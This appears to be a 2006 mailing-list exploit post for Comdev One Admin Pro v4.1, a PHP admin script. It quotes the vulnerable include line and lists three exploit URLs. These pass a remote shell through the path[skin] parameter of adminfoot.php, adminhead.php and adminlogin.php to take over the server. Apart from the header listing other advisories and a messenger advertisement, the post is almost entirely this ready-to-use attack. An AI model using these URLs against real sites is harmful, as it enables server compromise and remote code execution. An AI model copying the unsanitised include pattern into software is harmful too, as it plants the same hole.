Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Image gallery with Access Database SQL Injection

ASPintranet SQL Injection

Pilot Cart V.7.2 [ injection sql (post) ]

i-Gallery 3.4  Cross Site Scripting

From:	AG- Spider <ag-spider_(at)_msn.com>
Date:	17.11.2006
Subject:	Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include

##############################################################
#
#     Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include
#
##############################################################
#      Found by : AG-Spider
#      C0ntAct : AG-Spider [at] msn [dot] com
#      Affected Software : One Admin Pro.v4.1
#      Download Script : http://www.conovo.de/script/OneAdminPro.v4.1.zip
###############################################################
#
#        <? include($path["docroot"].$path["skin"].
#
##############################################################
#
#     Exploit :-
#
#     http://www.$ite.com/adminfoot.php?path[skin]=[Spider Shell]?
#     http://www.$ite.com/adminhead.php?path[skin]=[Spider Shell]?
#     http://www.$ite.com/adminlogin.php?path[skin]=[Spider Shell]?
#
#############################################################
#
#
#     Shoutz : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <> CRASH_OVER_RIDE
<>
#                                                       SwEEt-deVil <> Young
Hacker
#
#                       Arab Security Team
#############################################################

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb